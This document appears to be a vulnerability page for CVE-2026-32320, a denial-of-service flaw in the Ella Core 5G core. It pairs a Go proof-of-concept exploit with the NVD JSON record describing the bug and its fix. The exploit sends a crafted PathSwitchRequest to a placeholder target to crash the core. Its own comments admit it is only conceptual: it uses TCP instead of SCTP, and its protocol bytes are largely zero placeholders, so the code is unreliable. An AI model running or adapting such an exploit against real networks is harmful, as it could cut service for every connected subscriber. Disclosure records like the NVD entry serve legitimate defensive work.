CVE-2026-32320

// CVE-2026-32320 PoC - PathSwitchRequest with Zero-Length Algorithm Bitstrings // Target: Ella Core < 1.5.1 // This PoC demonstrates sending a malicious PathSwitchRequest message package main import ( "encoding/binary" "net" ) const NGAP_PORT = 38412 // NGAP Protocol IE Types const ( UE_SECURITY_CAPABILITIES = 0x00 PATH_SWITCH_REQUEST = 0x00 ) //构造包含零长度算法位串的UE Security Capabilities IE func buildZeroLengthAlgorithmBitstrings() []byte { // UE Security Capabilities IE with zero-length bitstrings ie := []byte{ 0x00, 0x00, // Protocol IE ID (UE Security Capabilities) 0x00, // Criticality (reject) 0x00, // Presence (mandatory) } // Length - 2 bytes for NR encryption and integrity algorithms // But we will set length to minimum and use zero-length bitstrings ie = append(ie, 0x00, 0x02) // Length = 2 // NR encryption algorithms - ZERO LENGTH (this triggers the vulnerability) ie = append(ie, 0x00) // NR integrity protection algorithms - ZERO LENGTH ie = append(ie, 0x00) // Add padding for other optional fields if needed return ie } //构造PathSwitchRequest消息 func buildMaliciousPathSwitchRequest() []byte { msg := []byte{ // NGAP PDU Header 0x00, 0x00, // Procedure Code (Path Switch Request) 0x00, // Criticality } // Add malicious UE Security Capabilities IE msg = append(msg, buildZeroLengthAlgorithmBitstrings()...) return msg } func main() { target := "TARGET_IP:38412" // Replace with target Ella Core IP conn, err := net.Dial("tcp", target) if err != nil { panic("Failed to connect: " + err.Error()) } defer conn.Close() maliciousMsg := buildMaliciousPathSwitchRequest() // Send the malicious message _, err = conn.Write(maliciousMsg) if err != nil { panic("Failed to send: " + err.Error()) } println("Malicious PathSwitchRequest sent. Target should panic.") } // Note: This is a conceptual PoC. Actual implementation requires: // 1. Valid SCTP association establishment // 2. Proper NGAP message encoding per 3GPP TS 38.413 // 3. Valid RAN UE NGAP ID and AMF UE NGAP ID // 4. Proper PDU Session Resource Switched List if required

{"cve": {"id": "CVE-2026-32320", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:42.450", "lastModified": "2026-03-19T13:38:45.690", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ella Core is a 5G core designed for private networks. Prior to 1.5.1, Ella Core panics when processing a PathSwitchRequest containing UE Security Capabilities with zero-length NR encryption or integrity protection algorithm bitstrings, resulting in a denial of service. An attacker able to send crafted NGAP messages to Ella Core can crash the process, causing service disruption for all connected subscribers. No authentication is required. This vulnerability is fixed in 1.5.1."}, {"lang": "es", "value": "Ella Core es un núcleo 5G diseñado para redes privadas. Antes de la versión 1.5.1, Ella Core entra en pánico al procesar una PathSwitchRequest que contiene capacidades de seguridad de UE con bitstrings de algoritmo de cifrado NR o de protección de integridad de longitud cero, lo que resulta en una denegación de servicio. Un atacante capaz de enviar mensajes NGAP manipulados a Ella Core puede bloquear el proceso, causando interrupción del servicio para todos los suscriptores conectados. No se requiere autenticación. Esta vulnerabilidad está corregida en la versión 1.5.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ellanetworks:ella_core:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.5.1", "matchCriteriaId": "187BCA62-CD29-487C-B2AE-AEEA54452188"}]}]}], "references": [{"url": "https://github.com/ellanetworks/core/security/advisories/GHSA-j478-p7vq-3347", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}